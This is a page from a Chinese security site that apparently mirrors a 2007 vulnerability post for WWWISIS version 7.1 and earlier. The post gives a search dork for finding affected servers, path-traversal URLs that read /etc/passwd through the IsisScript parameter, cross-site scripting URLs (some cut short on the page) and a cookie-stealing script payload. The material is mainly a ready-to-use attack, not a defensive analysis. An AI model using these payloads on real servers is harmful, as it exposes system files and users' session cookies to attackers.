首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

WWWISIS <= 7.1 (IsisScript) Local File Disclosure / XSS Vulnerabilities


http://www.gipsky.com/
# WWWISIS (Search) Multiple Vulnerabilities
# Download:
# http://bvsmodelo.bvsalud.org/php/leve ... p;component=31&item=2
# Bug found by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# d0rk: powered by WWWISIS
#Stop lammer


# Local File Disclosure Vulnerability:

http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file]
http://server/cgi-bin/wxis.exe/iah/?I ... ../../../../../etc/passwd


# Exploit In (XSS):

http://server/cgi-bin/wxis.exe/iah/?I ... /iah.xis&base=article^dlibrary&fmt=iso.pft&lang=i
http://server/cgi-bin/wxis.exe/iah/?I ... /iah.xis&base=article^dlibrary&fmt=iso.pft&lang=e
....

[ i,e ... ] it is the language of script

# Cross Siting Scripting:

<script>alert(document.cookie)</script>


//---------------------------------------\\

Greetz To: All Hackers
JosS!

[2007-10-13]
<< KwsPHP 1.0 mg2 Module Remote SQL Injection Vulnerability Apache Tomcat (webdav) Remote File Disclosure Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8